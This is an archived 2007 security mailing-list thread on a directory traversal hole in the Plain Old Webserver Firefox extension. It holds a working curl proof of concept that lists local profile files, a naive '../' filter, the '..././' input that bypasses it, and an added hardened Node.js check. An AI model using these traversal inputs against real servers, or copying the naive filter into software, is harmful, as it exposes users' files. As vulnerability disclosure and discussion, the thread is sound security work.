Re: [Full-disclosure] [WEB SECURITY] Plain Old Webserver - The coolest firefox extension

2007-02-23 Thread Matthew Flaschen
Stefano Di Paola wrote:
> Plain Old Web Server 
> Good  Old Dir Traversal
> 
> curl "127.0.0.1:6670/../../../../" -kivvv
> * About to connect() to 127.0.0.1 port 6670
> *   Trying 127.0.0.1... connected
> * Connected to 127.0.0.1 (127.0.0.1) port 6670
>> GET /../../../../ HTTP/1.1

Yep, I think it's just a rite of passage for all web servers.

Matthew Flaschen



___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

Re: [Full-disclosure] [WEB SECURITY] Plain Old Webserver - The coolest firefox extension

2007-02-12 Thread Billy Hoffman
All depends on where in the request processing you apply the fix. It's possible
that URL Decoding hasn't occurred yet, whereby I can bypass your filter
pretty easily. Not to mention Unicode...

Billy Hoffman
--
Lead Researcher, SPI Labs
SPI Dynamics Inc. - http://www.spidynamics.com
Phone:  678-781-4800
Direct:   678-781-4845

-Original Message-
From: ascii [mailto:[EMAIL PROTECTED] 
Sent: Friday, February 09, 2007 7:29 PM
To: full-disclosure@lists.grok.org.uk; [EMAIL PROTECTED]
Subject: Re: [WEB SECURITY] Plain Old Webserver - The coolest firefox
extension

pdp (architect) wrote:
> hei man, this is not a news :)

hehe, the maintainer should update the changelog with
this feature then :-)

i suggest this fix for the directory traversal bug

path = str_replace('../', '', path);

regards,
Francesco 'ascii' Ongaro
http://www.ush.it/

..././..././..././..././
how can't you love funsec?





Re: [Full-disclosure] [WEB SECURITY] Plain Old Webserver - The coolest firefox extension

2007-02-12 Thread Giorgio Fedon

I think that there is an implicit joke in the previous post...

"..././..././..././..././"
how can't you love funsec?

path = str_replace('../', '', path);

Becomes "../../../../" again...

GF

Re: [Full-disclosure] [WEB SECURITY] Plain Old Webserver - The coolest firefox extension

2007-02-12 Thread ascii
Billy Hoffman wrote:
> All depends on where in the request processing you apply the fix. It's
> possible that URL Decoding hasn't occurred yet, whereby I can bypass
> your filter pretty easily. Not to mention Unicode...

hehehe i was waiting for this : )

remember: this is funsec

the bypass for the filter is in the signature of the same mail

> path = str_replace('../', '', path);
>
> regards,
> Francesco 'ascii' Ongaro
> http://www.ush.it/
>
> ..././..././..././..././
> how can't you love funsec?

cause ..././..././..././..././ becomes ../../../../ since the replace is
applied only once. simple logic trick, no encoding at all

see you,
Francesco 'ascii' Ongaro
http://www.ush.it/
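
Added example, not part of any post in this thread: the single-pass filter discussed above next to a resolve-then-check form, in JavaScript (Node.js). It covers both points raised, the `..././` collapse and filtering before URL decoding; `ROOT`, the function names and the sample request paths are constructed for illustration.

```javascript
const path = require('node:path').posix;

const ROOT = '/srv/pow/htdocs'; // hypothetical document root

// Filter proposed in the thread: one left-to-right pass over
// non-overlapping matches, which is how PHP's str_replace behaves.
function naiveStrip(p) {
  return p.split('../').join('');
}

// Where a server lands if it filters first and URL-decodes afterwards.
function naiveResolve(rawUrlPath, root = ROOT) {
  const filtered = naiveStrip(rawUrlPath);
  return path.resolve(root, './' + decodeURIComponent(filtered));
}

// Hardened form: decode exactly once, canonicalise, then require that the
// result is still under the root. Returns null when the request is refused.
// Nothing is stripped, so "..." stays an ordinary (nonexistent) directory name.
function resolveInsideRoot(rawUrlPath, root = ROOT) {
  let decoded;
  try {
    decoded = decodeURIComponent(rawUrlPath);
  } catch (err) {
    return null; // malformed percent-encoding
  }
  // NUL and backslash are refused outright (a conservative choice).
  if (decoded.includes('\0') || decoded.includes('\\')) return null;
  const full = path.resolve(root, './' + decoded);
  return full === root || full.startsWith(root + '/') ? full : null;
}

// Constructed sample request paths.
const samples = [
  '/docs/index.html',
  '/..././..././..././etc/passwd',    // collapses to ../ after one pass
  '/%2e%2e/%2e%2e/%2e%2e/etc/passwd', // filter runs before decoding
];
for (const s of samples) {
  console.log(s, '| naive:', naiveResolve(s), '| hardened:', resolveInsideRoot(s));
}
```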



Re: [Full-disclosure] [WEB SECURITY] Plain Old Webserver - The coolest firefox extension

2007-02-10 Thread pdp (architect)
hei man, this is not a news :)

On 2/9/07, Stefano Di Paola <[EMAIL PROTECTED]> wrote:
> Plain Old Web Server
> Good  Old Dir Traversal
>
> curl "127.0.0.1:6670/../../../../" -kivvv
> * About to connect() to 127.0.0.1 port 6670
> *   Trying 127.0.0.1... connected
> * Connected to 127.0.0.1 (127.0.0.1) port 6670
> > GET /../../../../ HTTP/1.1
> > User-Agent: HackTheHacker(tm)
> > Host: 127.0.0.1:6670
> > Accept: */*
> >
> < HTTP/1.1 200 OK
> HTTP/1.1 200 OK
> < Set-Cookie: bc_test=true; expires=Thu, 05 Nov 2009 18:35:36 GMT;
> path=/;
> Set-Cookie: bc_test=true; expires=Thu, 05 Nov 2009 18:35:36 GMT; path=/;
> < Content-Type: text/html
> Content-Type: text/html
> < pow_server: POW/0.0.7
> pow_server: POW/0.0.7
> < Content-Location: /../../../../
> Content-Location: /../../../../
> < Content-Length: 280
> Content-Length: 280
>
> 
> firefox/
> bookmarks.html
> appreg
> default/
> pluginreg.dat
> * Connection #0 to host 127.0.0.1 left intact
> * Closing connection #0
>
>
> A new motto is on the way:
> HackTheHacker (ascii (tm))
>
> :)
>
> Cheers,
> Stefano
>
> On Fri, 09/02/2007 at 16.23 +, pdp (architect) wrote:
> > http://www.gnucitizen.org/blog/plain-old-webserver
> >
> > Must have Firefox Extension that allows you to do all sorts of crazy stuff.
> >
> > https://addons.mozilla.org/firefox/3002/
> >
> --
> ...oOOo...oOOo
> Stefano Di Paola
> Software & Security Engineer
>
> Web: www.wisec.it
> ..
>
>


-- 
pdp (architect) | petko d. petkov
http://www.gnucitizen.org



Re: [Full-disclosure] [WEB SECURITY] Plain Old Webserver - The coolest firefox extension

2007-02-09 Thread ascii
pdp (architect) wrote:
> hei man, this is not a news :)

hehe, the maintainer should update the changelog with
this feature then :-)

i suggest this fix for the directory traversal bug

path = str_replace('../', '', path);

regards,
Francesco 'ascii' Ongaro
http://www.ush.it/

..././..././..././..././
how can't you love funsec?



Re: [Full-disclosure] [WEB SECURITY] Plain Old Webserver - The coolest firefox extension

2007-02-09 Thread Stefano Di Paola
Plain Old Web Server 
Good  Old Dir Traversal

curl "127.0.0.1:6670/../../../../" -kivvv
* About to connect() to 127.0.0.1 port 6670
*   Trying 127.0.0.1... connected
* Connected to 127.0.0.1 (127.0.0.1) port 6670
> GET /../../../../ HTTP/1.1
> User-Agent: HackTheHacker(tm)
> Host: 127.0.0.1:6670
> Accept: */*
> 
< HTTP/1.1 200 OK
HTTP/1.1 200 OK
< Set-Cookie: bc_test=true; expires=Thu, 05 Nov 2009 18:35:36 GMT;
path=/;
Set-Cookie: bc_test=true; expires=Thu, 05 Nov 2009 18:35:36 GMT; path=/;
< Content-Type: text/html
Content-Type: text/html
< pow_server: POW/0.0.7
pow_server: POW/0.0.7
< Content-Location: /../../../../
Content-Location: /../../../../
< Content-Length: 280
Content-Length: 280


firefox/
bookmarks.html
appreg
default/
pluginreg.dat
* Connection #0 to host 127.0.0.1 left intact
* Closing connection #0


A new motto is on the way:
HackTheHacker (ascii (tm))

:)

Cheers,
Stefano

On Fri, 09/02/2007 at 16.23 +, pdp (architect) wrote:
> http://www.gnucitizen.org/blog/plain-old-webserver
> 
> Must have Firefox Extension that allows you to do all sorts of crazy stuff.
> 
> https://addons.mozilla.org/firefox/3002/
> 
-- 
...oOOo...oOOo
Stefano Di Paola
Software & Security Engineer

Web: www.wisec.it
..
